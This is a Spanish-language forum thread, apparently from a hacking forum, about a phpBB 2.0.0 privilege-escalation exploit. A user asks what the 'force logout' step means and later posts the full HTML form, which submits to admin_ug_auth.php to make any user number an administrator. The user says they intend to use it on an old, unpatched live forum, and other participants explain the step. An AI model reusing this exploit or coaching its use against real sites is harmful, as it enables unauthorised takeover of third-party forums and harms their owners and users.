Hace MUCHO tiempo atrás (2002), en este foro, se hizo una prueba donde Tse Tse subió un foro donde uno tenía que crear un usuario y conseguir que éste tenga permisos de Administrador. Sin embargo, es que hace poco tiempo descubrí esta prueba y a la vez conseguí el exploit que se usó esa vez. El problema es el siguiente: Tse Tse resumió como se podía entrar al foro de manera fácil, pero dijo esto:


5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.

No sé lo que es "dar un logout por fuerza", ya que cuando intento hacer la última parte me sale lo que presagiaba Tse Tse en el punto 6.

Información
Usted no esta autorizado para administrar este Foro

Necesito que me digan como "dar logout por fuerza", ya que ese paso no logro comprenderlo y no puedo finalizar mi tarea :cool:

GRACIAS AMIGOS!

P.D: Para los que participaron en ese reto, les dejo la pagina para que se acuerden ;) http://www.hackhispano.com/foro/archive/index.php/t-5332.html

Hombre, pero esa versión es la phpBB 2.0.0.
Actualmente ya trabajan con la version 2.0.21

ademas... no creo que a LUK le agrade que andes haciendo prubas en este foro :)

Yo no estoi haciendo pruebas en este foro. ¿Para qué?, si varias dudas ya las he resuelto gracias a la buena voluntad de los que han posteado en el foro.

Sólo necesito saber que es "dar logout por fuerza" y listo. Nunca dije que estaba haciendo pruebas con este foro. Sólo encontré un foro antiguo con esa falla, y quedo pegado en "dar logout por fuerza".

Gracias.

Sólo encontré un foro antiguo con esa falla, y quedo pegado en "dar logout por fuerza".Gracias.
A eso me refería. ¿Todavía hay foros sin parchear por ahi?

A eso me refería. ¿Todavía hay foros sin parchear por ahi?

Claro amigo, todavía hay algunos foros sin parchear, aunque no son muchos.

Pero para explotar la falla, necesito saber qué es "dar logout por fuerza". ¿Alguien me puede ayudar en ese punto? por favor :) :0=

Creo que Tse-Tse se referia a que "a la fuerza", es decir, por c__jones, hay que hacer un logout, o por lo menos eso me suena de esa vulnerabilidad a mi (de eso hace ya tiempo :D )

Creo que Tse-Tse se referia a que "a la fuerza", es decir, por c__jones, hay que hacer un logout, o por lo menos eso me suena de esa vulnerabilidad a mi (de eso hace ya tiempo :D )

Amigo, no logré comprender mucho tu mensaje. Si me puedes explicar mejor, te lo agradecería mucho.

Gracias!! :0= :p

Que no es un método de hacer logout, sino que obligatoriamente tienes que desloguearte.

Que no es un método de hacer logout, sino que obligatoriamente tienes que desloguearte.

Una última consulta. Cuando aplico el exploit y me deslogueo me sale la casilla de usuario y contraseña para ingresar al foro.

Algo está mal?

<html>
<head>
</head>
<body>
<form method="post"
action="http://xxx.xxx.xxx.xxx/reccon/phpBB2/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrador</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

A mi parecer el exploit está bien. ¿Qué estaré haciendo mal? Ayudaaa

:0=